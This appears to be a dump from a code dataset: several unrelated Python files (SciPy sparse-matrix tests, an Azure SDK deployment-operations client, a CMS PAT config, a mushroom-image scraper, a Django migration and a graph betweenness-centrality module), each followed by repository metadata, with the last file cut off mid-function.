assert_array_almost_equal(B.todense(), A.todense() * A.T.todense())
assert_array_almost_equal(B.todense(), A.todense() * A.todense().T)
# check dimension mismatch 2x2 times 3x2
A = self.spmatrix( [[1,2],[3,4]] )
B = self.spmatrix( [[1,2],[3,4],[5,6]] )
assert_raises(ValueError, A.__mul__, B)
@dec.knownfailureif(sys.version[:3] == '2.4', "See ticket 1559")
def test_sub_dense(self):
""" subtracting a dense matrix to/from a sparse matrix
"""
sum1 = 3*self.dat - self.datsp
assert_array_equal(sum1, 2*self.dat)
sum2 = 3*self.datsp - self.dat
assert_array_equal(sum2, 2*self.dat)
class TestLIL( _TestCommon, _TestHorizSlicing, _TestVertSlicing,
_TestBothSlicing, _TestGetSet, _TestSolve,
_TestArithmetic, _TestInplaceArithmetic, _TestFancyIndexing,
TestCase):
spmatrix = lil_matrix
B = lil_matrix((4,3))
B[0,0] = 2
B[1,2] = 7
B[2,1] = 3
B[3,0] = 10
@dec.knownfailureif(True, "Fancy indexing is known to be broken for LIL" \
" matrices")
def test_fancy_indexing_set(self):
_TestFancyIndexing.test_fancy_indexing_set(self)
@dec.knownfailureif(True, "Fancy indexing is known to be broken for LIL" \
" matrices")
def test_fancy_indexing_randomized(self):
_TestFancyIndexing.test_fancy_indexing_randomized(self)
def test_dot(self):
A = matrix(zeros((10,10)))
A[0,3] = 10
A[5,6] = 20
B = lil_matrix((10,10))
B[0,3] = 10
B[5,6] = 20
assert_array_equal(A * A.T, (B * B.T).todense())
assert_array_equal(A * A.H, (B * B.H).todense())
def test_scalar_mul(self):
x = lil_matrix((3,3))
x[0,0] = 2
x = x*2
assert_equal(x[0,0],4)
x = x*0
assert_equal(x[0,0],0)
def test_reshape(self):
x = lil_matrix((4,3))
x[0,0] = 1
x[2,1] = 3
x[3,2] = 5
x[0,2] = 7
for s in [(12,1),(1,12)]:
assert_array_equal(x.reshape(s).todense(),
x.todense().reshape(s))
def test_lil_lil_assignment(self):
""" Tests whether a row of one lil_matrix can be assigned to
another.
"""
B = self.B.copy()
A = B / 10
B[0,:] = A[0,:]
assert_array_equal(A[0,:].A, B[0,:].A)
def test_inplace_ops(self):
A = lil_matrix([[0,2,3],[4,0,6]])
B = lil_matrix([[0,1,0],[0,2,3]])
data = {'add': (B,A + B),
'sub': (B,A - B),
'mul': (3,A * 3)}
for op,(other,expected) in data.iteritems():
result = A.copy()
getattr(result, '__i%s__' % op)(other)
assert_array_equal(result.todense(), expected.todense())
def test_lil_slice_assignment(self):
B = lil_matrix((4,3))
B[0,0] = 5
B[1,2] = 3
B[2,1] = 7
expected = array([[10,0,0],
[0,0,6],
[0,14,0],
[0,0,0]])
B[:,:] = B+B
assert_array_equal(B.todense(),expected)
block = [[1,0],[0,4]]
B[:2,:2] = csc_matrix(array(block))
assert_array_equal(B.todense()[:2,:2],block)
def test_lil_sequence_assignment(self):
A = lil_matrix((4,3))
B = eye(3,4,format='lil')
i0 = [0,1,2]
i1 = (0,1,2)
i2 = array( i0 )
A[0,i0] = B[i0,0]
A[1,i1] = B[i1,1]
A[2,i2] = B[i2,2]
assert_array_equal(A.todense(),B.T.todense())
# column slice
A = lil_matrix((2,3))
A[1,1:3] = [10,20]
assert_array_equal(A.todense(), [[0,0,0],[0,10,20]])
# column slice
A = lil_matrix((3,2))
A[1:3,1] = [[10],[20]]
assert_array_equal(A.todense(), [[0,0],[0,10],[0,20]])
def test_lil_iteration(self):
row_data = [[1,2,3],[4,5,6]]
B = lil_matrix(array(row_data))
for r,row in enumerate(B):
assert_array_equal(row.todense(),array(row_data[r],ndmin=2))
def test_lil_from_csr(self):
""" Tests whether a lil_matrix can be constructed from a
csr_matrix.
"""
B = lil_matrix((10,10))
B[0,3] = 10
B[5,6] = 20
B[8,3] = 30
B[3,8] = 40
B[8,9] = 50
C = B.tocsr()
D = lil_matrix(C)
assert_array_equal(C.A, D.A)
def test_fancy_indexing(self):
M = arange(25).reshape(5,5)
A = lil_matrix( M )
assert_equal(A[array([1,2,3]),2:3].todense(), M[array([1,2,3]),2:3])
def test_point_wise_multiply(self):
l = lil_matrix((4,3))
l[0,0] = 1
l[1,1] = 2
l[2,2] = 3
l[3,1] = 4
m = lil_matrix((4,3))
m[0,0] = 1
m[0,1] = 2
m[2,2] = 3
m[3,1] = 4
m[3,2] = 4
assert_array_equal(l.multiply(m).todense(),
m.multiply(l).todense())
assert_array_equal(l.multiply(m).todense(),
[[1,0,0],
[0,0,0],
[0,0,9],
[0,16,0]])
def test_lil_multiply_removal(self):
"""Ticket #1427."""
a = lil_matrix(np.ones((3,3)))
a *= 2.
a[0, :] = 0
class TestCOO(_TestCommon, TestCase):
spmatrix = coo_matrix
def test_constructor1(self):
"""unsorted triplet format"""
row = array([2, 3, 1, 3, 0, 1, 3, 0, 2, 1, 2])
col = array([0, 1, 0, 0, 1, 1, 2, 2, 2, 2, 1])
data = array([ 6., 10., 3., 9., 1., 4.,
11., 2., 8., 5., 7.])
coo = coo_matrix((data,(row,col)),(4,3))
assert_array_equal(arange(12).reshape(4,3),coo.todense())
def test_constructor2(self):
"""unsorted triplet format with duplicates (which are summed)"""
row = array([0,1,2,2,2,2,0,0,2,2])
col = array([0,2,0,2,1,1,1,0,0,2])
data = array([2,9,-4,5,7,0,-1,2,1,-5])
coo = coo_matrix((data,(row,col)),(3,3))
mat = matrix([[4,-1,0],[0,0,9],[-3,7,0]])
assert_array_equal(mat,coo.todense())
def test_constructor3(self):
"""empty matrix"""
coo = coo_matrix( (4,3) )
assert_array_equal(coo.shape,(4,3))
assert_array_equal(coo.row,[])
assert_array_equal(coo.col,[])
assert_array_equal(coo.data,[])
assert_array_equal(coo.todense(),zeros((4,3)))
def test_constructor4(self):
"""from dense matrix"""
mat = array([[0,1,0,0],
[7,0,3,0],
[0,4,0,0]])
coo = coo_matrix(mat)
assert_array_equal(coo.todense(),mat)
#upgrade rank 1 arrays to row matrix
mat = array([0,1,0,0])
coo = coo_matrix(mat)
assert_array_equal(coo.todense(),mat.reshape(1,-1))
class TestDIA(_TestCommon, _TestArithmetic, TestCase):
spmatrix = dia_matrix
def test_constructor1(self):
D = matrix([[1, 0, 3, 0],
[1, 2, 0, 4],
[0, 2, 3, 0],
[0, 0, 3, 4]])
data = np.array([[1,2,3,4]]).repeat(3,axis=0)
offsets = np.array([0,-1,2])
assert_equal(dia_matrix( (data,offsets), shape=(4,4)).todense(), D)
class TestBSR(_TestCommon, _TestArithmetic, _TestInplaceArithmetic, TestCase):
spmatrix = bsr_matrix
def test_constructor1(self):
"""check native BSR format constructor"""
indptr = array([0,2,2,4])
indices = array([0,2,2,3])
data = zeros((4,2,3))
data[0] = array([[ 0, 1, 2],
[ 3, 0, 5]])
data[1] = array([[ 0, 2, 4],
[ 6, 0, 10]])
data[2] = array([[ 0, 4, 8],
[12, 0, 20]])
data[3] = array([[ 0, 5, 10],
[15, 0, 25]])
A = kron( [[1,0,2,0],[0,0,0,0],[0,0,4,5]], [[0,1,2],[3,0,5]] )
Asp = bsr_matrix((data,indices,indptr),shape=(6,12))
assert_equal(Asp.todense(),A)
#infer shape from arrays
Asp = bsr_matrix((data,indices,indptr))
assert_equal(Asp.todense(),A)
def test_constructor2(self):
"""construct from dense"""
#test zero mats
for shape in [ (1,1), (5,1), (1,10), (10,4), (3,7), (2,1)]:
A = zeros(shape)
assert_equal(bsr_matrix(A).todense(),A)
A = zeros((4,6))
assert_equal(bsr_matrix(A,blocksize=(2,2)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(2,3)).todense(),A)
A = kron( [[1,0,2,0],[0,0,0,0],[0,0,4,5]], [[0,1,2],[3,0,5]] )
assert_equal(bsr_matrix(A).todense(),A)
assert_equal(bsr_matrix(A,shape=(6,12)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(1,1)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(2,3)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(2,6)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(2,12)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(3,12)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(6,12)).todense(),A)
A = kron( [[1,0,2,0],[0,1,0,0],[0,0,0,0]], [[0,1,2],[3,0,5]] )
assert_equal(bsr_matrix(A,blocksize=(2,3)).todense(),A)
def test_eliminate_zeros(self):
data = kron([1, 0, 0, 0, 2, 0, 3, 0], [[1,1],[1,1]]).T
data = data.reshape(-1,2,2)
indices = array( [1, 2, 3, 4, 5, 6, 7, 8] )
indptr = array( [0, 3, 8] )
asp = bsr_matrix( (data, indices, indptr), shape=(4,20) )
bsp = asp.copy()
asp.eliminate_zeros()
assert_array_equal(asp.nnz, 3*4)
assert_array_equal(asp.todense(),bsp.todense())
def test_bsr_matvec(self):
A = bsr_matrix( arange(2*3*4*5).reshape(2*4,3*5), blocksize=(4,5) )
x = arange(A.shape[1]).reshape(-1,1)
assert_equal(A*x, A.todense()*x)
def test_bsr_matvecs(self):
A = bsr_matrix( arange(2*3*4*5).reshape(2*4,3*5), blocksize=(4,5) )
x = arange(A.shape[1]*6).reshape(-1,6)
assert_equal(A*x, A.todense()*x)
if __name__ == "__main__":
run_module_suite()
|
[
"georgios@kaleadis.de"
] |
georgios@kaleadis.de
|
7afb0ea84644b1bf6afbc0de0954989346d9d818
|
531c47c15b97cbcb263ec86821d7f258c81c0aaf
|
/sdk/resources/azure-mgmt-resource/azure/mgmt/resource/resources/v2018_05_01/operations/_deployment_operations_operations.py
|
9b382ad50a49f1db1c0b2bf544db7ab840f5b10d
|
[
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] |
permissive
|
YijunXieMS/azure-sdk-for-python
|
be364d3b88204fd3c7d223df23756386ff7a3361
|
f779de8e53dbec033f98f976284e6d9491fd60b3
|
refs/heads/master
| 2021-07-15T18:06:28.748507
| 2020-09-04T15:48:52
| 2020-09-04T15:48:52
| 205,457,088
| 1
| 2
|
MIT
| 2020-06-16T16:38:15
| 2019-08-30T21:08:55
|
Python
|
UTF-8
|
Python
| false
| false
| 15,317
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class DeploymentOperationsOperations(object):
"""DeploymentOperationsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.resource.resources.v2018_05_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def get_at_subscription_scope(
self,
deployment_name, # type: str
operation_id, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.DeploymentOperation"
"""Gets a deployments operation.
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param operation_id: The ID of the operation to get.
:type operation_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeploymentOperation, or the result of cls(response)
:rtype: ~azure.mgmt.resource.resources.v2018_05_01.models.DeploymentOperation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.DeploymentOperation"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-05-01"
# Construct URL
url = self.get_at_subscription_scope.metadata['url'] # type: ignore
path_format_arguments = {
'deploymentName': self._serialize.url("deployment_name", deployment_name, 'str', max_length=64, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'operationId': self._serialize.url("operation_id", operation_id, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('DeploymentOperation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_at_subscription_scope.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Resources/deployments/{deploymentName}/operations/{operationId}'} # type: ignore
def list_at_subscription_scope(
self,
deployment_name, # type: str
top=None, # type: Optional[int]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.DeploymentOperationsListResult"]
"""Gets all deployments operations for a deployment.
:param deployment_name: The name of the deployment with the operation to get.
:type deployment_name: str
:param top: The number of results to return.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DeploymentOperationsListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.resource.resources.v2018_05_01.models.DeploymentOperationsListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.DeploymentOperationsListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-05-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_at_subscription_scope.metadata['url'] # type: ignore
path_format_arguments = {
'deploymentName': self._serialize.url("deployment_name", deployment_name, 'str', max_length=64, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('DeploymentOperationsListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_at_subscription_scope.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Resources/deployments/{deploymentName}/operations'} # type: ignore
def get(
self,
resource_group_name, # type: str
deployment_name, # type: str
operation_id, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.DeploymentOperation"
"""Gets a deployments operation.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param operation_id: The ID of the operation to get.
:type operation_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeploymentOperation, or the result of cls(response)
:rtype: ~azure.mgmt.resource.resources.v2018_05_01.models.DeploymentOperation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.DeploymentOperation"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-05-01"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'deploymentName': self._serialize.url("deployment_name", deployment_name, 'str', max_length=64, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'operationId': self._serialize.url("operation_id", operation_id, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('DeploymentOperation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/deployments/{deploymentName}/operations/{operationId}'} # type: ignore
def list(
self,
resource_group_name, # type: str
deployment_name, # type: str
top=None, # type: Optional[int]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.DeploymentOperationsListResult"]
"""Gets all deployments operations for a deployment.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment with the operation to get.
:type deployment_name: str
:param top: The number of results to return.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DeploymentOperationsListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.resource.resources.v2018_05_01.models.DeploymentOperationsListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.DeploymentOperationsListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-05-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'deploymentName': self._serialize.url("deployment_name", deployment_name, 'str', max_length=64, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('DeploymentOperationsListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/deployments/{deploymentName}/operations'} # type: ignore
|
[
"noreply@github.com"
] |
YijunXieMS.noreply@github.com
|
1bb07661e2f145c524b06a23863cf532e2036f4e
|
28f8a21b5d4b961477f105bddeb36654a6cc3d57
|
/PhysicsTools/PatAlgos/test/patTuple_fastsim_cfg.py
|
b6fe834b06fb3292157515ba9c9effe49b9100d3
|
[] |
no_license
|
fcostanz/NTupler
|
316be24ca3c8b9784def7e0deea3fd5ead58f72e
|
adc566a93ad4973fe61a1a9a24ceaabc3973a7ed
|
refs/heads/master
| 2016-09-06T03:57:21.982267
| 2014-02-17T10:01:14
| 2014-02-17T10:01:14
| 16,286,291
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,059
|
py
|
## import skeleton process
from PhysicsTools.PatAlgos.patTemplate_cfg import *
## let it run
process.p = cms.Path(
process.patDefaultSequence
)
## ------------------------------------------------------
# In addition you usually want to change the following
# parameters:
## ------------------------------------------------------
#
# process.GlobalTag.globaltag = ... ## (according to https://twiki.cern.ch/twiki/bin/view/CMS/SWGuideFrontierConditions)
# ##
# process.source.fileNames = ... ## (e.g. 'file:AOD.root')
# ##
process.maxEvents.input = 10
# ##
# process.out.outputCommands = [ ... ] ## (e.g. taken from PhysicsTools/PatAlgos/python/patEventContent_cff.py)
# ##
process.out.fileName = 'patTuple_fastsim.root'
# ##
# process.options.wantSummary = False ## (to suppress the long output at the end of the job)
|
[
"fcost@nafhh-cms02.desy.de"
] |
fcost@nafhh-cms02.desy.de
|
c73b83f30926c4562ba946d153ecae54b4d5eb9c
|
661b81143e1d99c2f2bad8dc78c6a5830667d47e
|
/skriptid/scraper_mushroomworld.py
|
eb18ff02a17e794f63743d317d05fc87e5279e88
|
[] |
no_license
|
andry1001/seenetuvastaja
|
764405b78b824c5350c72f9fa4db193881dbe8d5
|
d110eb3790e2c09efcffa8d08662e9cff3908abb
|
refs/heads/master
| 2020-05-18T06:13:01.899127
| 2019-09-07T10:47:37
| 2019-09-07T10:47:37
| 184,227,476
| 0
| 0
| null | null | null | null |
WINDOWS-1252
|
Python
| false
| false
| 2,103
|
py
|
###########################################################################################################################
# When writing this script, code from the following pages was used as a basis:                                           #
# https://stackoverflow.com/questions/18408307/how-to-extract-and-download-all-images-from-a-website-using-beautifulsoup #
# #
# The following code snippet collects data from the mushroom.world database.                                             #
# #
###########################################################################################################################
import os
import re
import requests
from bs4 import BeautifulSoup
labels = []
BASEDIR = ".\ANDMED"
for SUBDIR in os.listdir(BASEDIR):
path = os.path.join(BASEDIR, SUBDIR)
extracted = os.path.basename(os.path.normpath(path))
label = extracted.lower()
labels.append(label)
BASEURL = 'http://www.mushroom.world/show?n='
for label in labels:
new_label = label.replace("_", "-")
URL = BASEURL + new_label
response = requests.get(URL)
soup = BeautifulSoup(response.text, 'html.parser')
img_tags = soup.find_all('img')
urls = [img['src'] for img in img_tags]
for url in urls:
try:
mod_url = "http://www.mushroom.world" + url.split("..")[1]
filename = re.search(r'/([\w_-]+[.](JPG|GIF|PNG))$', mod_url)
new_filename = filename.group(1)
new_filename = BASEDIR + '\\' + label + '\\' + new_filename
with open(new_filename, 'wb') as f:
if 'http' not in mod_url:
url = '{}{}'.format(URL, mod_url)
response = requests.get(mod_url)
f.write(response.content)
f.close()
except:
print(label)
|
[
"noreply@github.com"
] |
andry1001.noreply@github.com
|
cf67ea891aa1db6ec1100a61523886a37e8b7585
|
5c929ec2036ff04dbaaa78a5939380095b1075b9
|
/archiv/migrations/0037_usecase_custom_layer.py
|
5bdb64a491ee0bc035bde96aff97179e70841e78
|
[
"MIT"
] |
permissive
|
acdh-oeaw/mmp
|
9c0535129446123e32ce5a104447b7432b4e7e05
|
5381aa97757c456d0ce4f68137f5287e57376629
|
refs/heads/master
| 2023-04-15T06:26:25.605304
| 2023-03-28T12:14:43
| 2023-03-28T12:14:43
| 334,097,604
| 3
| 0
|
MIT
| 2023-03-28T12:14:45
| 2021-01-29T09:32:19
|
Python
|
UTF-8
|
Python
| false
| false
| 568
|
py
|
# Generated by Django 3.2.9 on 2022-06-09 05:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('archiv', '0036_spatialcoverage_show_labels'),
]
operations = [
migrations.AddField(
model_name='usecase',
name='custom_layer',
field=models.CharField(blank=True, help_text="This name needs to match a specific layer name, e.g '800' to load a layer '800'", max_length=250, null=True, verbose_name='Name of additional Layer'),
),
]
|
[
"peter.andorfer@oeaw.ac.at"
] |
peter.andorfer@oeaw.ac.at
|
49292474819489ee394693df757244bb7466aee7
|
1426a4f8b67e32394613e89802e04611d5d777fe
|
/try_baike1.py
|
b10a5b36057c2f81b28f04b02c1d5c256e43ca53
|
[] |
no_license
|
HuaienYao/python-crawler
|
ea62ed920d52ffacfabe5a919dee62b61e3147c5
|
630e3f92436f1ba8b470d3f30872759da9bf53ae
|
refs/heads/master
| 2020-04-19T22:47:39.041827
| 2019-02-01T08:43:58
| 2019-02-01T08:43:58
| 168,479,203
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 412
|
py
|
# This code is a small experiment in crawling Baidu Baike
from bs4 import BeautifulSoup
from urllib.request import urlopen
import re
import random
# set the starting url
base_url = "https://baike.baidu.com"
his = ["/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711"]
url = base_url + his[-1]
html = urlopen(url).read().decode('utf-8')
soup = BeautifulSoup(html,features='lxml')
print(soup.find('h1').get_text(),'url:',his[-1])
|
[
"wyane.yia@gmail.com"
] |
wyane.yia@gmail.com
|
bf8afdc6a17a89cceb0f8505c726252ddb799c71
|
30c8de06d3181d53cc2549cca3ae3363142793ed
|
/adaptable networks/experiments/algorithms/importance/betweenness_centrality.py
|
bcd7c5af0631a7f11e1dcc15bb9abfcfbcd20829
|
[] |
no_license
|
sanket-patil/Complex-Networks
|
6ac6d431958b288c82c54ec08c1f0e8533bc6c1a
|
8d99f23000ad994032a846bdbb84daa948cfa460
|
refs/heads/master
| 2021-01-13T07:29:40.179392
| 2013-01-10T04:37:52
| 2013-01-10T04:37:52
| 3,737,590
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,867
|
py
|
''' Computes the betweenness centrality measures. '''
import algorithms.paths.paths
def getNodeBetweennessSequence(gr = None, nl = None, apsp = None):
betweenness = {}
plist = apsp
nodes = nl
if gr:
nodes = gr.getNodeList()
plist = algorithms.paths.paths.getAPSP(gr, allsp = True)
elif not nodes or not plist:
return None
for v in nodes:
betweenness[v] = 0.0
for v in betweenness.keys():
for s in betweenness.keys():
if s == v:
continue
for t in betweenness.keys():
if t == v or t == s:
continue
froms = plist[s]
thru = float(froms.getNumShortestPathsThroughNode(v, s, t))
betn = float(froms.getNumShortestPathsBetween(s, t))
incr = 0.0
if not betn == 0.0:
incr = thru/betn
betweenness[v] += incr
return betweenness
def getNodeBetnSeq(gr = None, nl = None, apsp = None):
nbseq = getNodeBetweennessSequence(gr, nl, apsp)
return [v for v in nbseq.values()]
def getNodeBetweennessDistribution(gr = None, nl = None, apsp = None):
betweenness = getNodeBetweennessSequence(gr, nl, apsp)
total = sum([v for v in betweenness.values()])
if total:
for k, v in betweenness.items():
betweenness[k] = v/total
return betweenness
def getNodeBetnDist(gr = None, nl = None, apsp = None):
nbdist = getNodeBetweennessDistribution(gr, nl, apsp)
return [v for v in nbdist.values()]
def getNodeBetweenness(gr, nd):
    '''Betweenness of the single node nd, computed from all shortest paths in gr.'''
    betweenness = 0.0
    nodes = gr.getNodeList()
    plist = algorithms.paths.paths.getAPSP(gr, allsp = True)
    for s in nodes:
        if s == nd:
            continue
        for t in nodes:
            if t == nd or t == s:
                continue
            froms = plist[s]
            thru = float(froms.getNumShortestPathsThroughNode(nd, s, t))
            betn = float(froms.getNumShortestPathsBetween(s, t))
            if not betn == 0.0:
                betweenness += thru/betn
    return betweenness
def getHighestNodeBetweenness(gr = None, nl = None, apsp = None):
return max(getNodeBetnSeq(gr, nl, apsp))
def getNodeWithMaxBetweenness(gr = None, nl = None, apsp = None):
nbseq = getNodeBetweennessSequence(gr, nl, apsp)
return max([(nbseq[k],k) for k in nbseq])[1]
def getAverageNodeBetweenness(gr = None, nl = None, apsp = None):
if gr:
return sum(getNodeBetnSeq(gr))/float(gr.getNumNodes())
if nl and apsp:
return sum(getNodeBetnSeq(gr, nl, apsp))/float(len(nl))
return -1
def getNormalizedHighestNodeBetweenness(gr = None, nl = None, apsp = None):
return max(getNodeBetnDist(gr, nl, apsp))
def getNormalizedAverageNodeBetweenness(gr = None, nl = None, apsp = None):
if gr:
return 1.0/float(gr.getNumNodes())
if nl and apsp:
return 1.0/float(len(nl))
return -1
def getNodeBetweennessSkew(gr = None, nl = None, apsp = None):
nbseq = getNodeBetnSeq(gr, nl, apsp)
maxbetn = max(nbseq)
n = 0
if gr:
n = float(gr.getNumNodes())
else:
n = float(len(nl))
avbetn = sum(nbseq)/n
return maxbetn - avbetn
def getNormalizedNodeBetweennessSkew(gr = None, nl = None, apsp = None):
nbdist = getNodeBetnDist(gr, nl, apsp)
maxbetn = max(nbdist)
n = 0
if gr:
n = float(gr.getNumNodes())
else:
n = float(len(nl))
avbetn = 1.0/n
return maxbetn - avbetn
def getEdgeBetweennessSequence(gr = None, nl = None, el = None, apsp = None):
betweenness = {}
plist = apsp
edges = el
nodes = nl
if gr:
nodes = gr.getNodeList()
edges = gr.getEdgeList()
plist = algorithms.paths.paths.getAPSP(gr, allsp = True)
elif not edges or not nodes or not plist:
return None
for ed in edges:
betweenness[ed] = 0.0
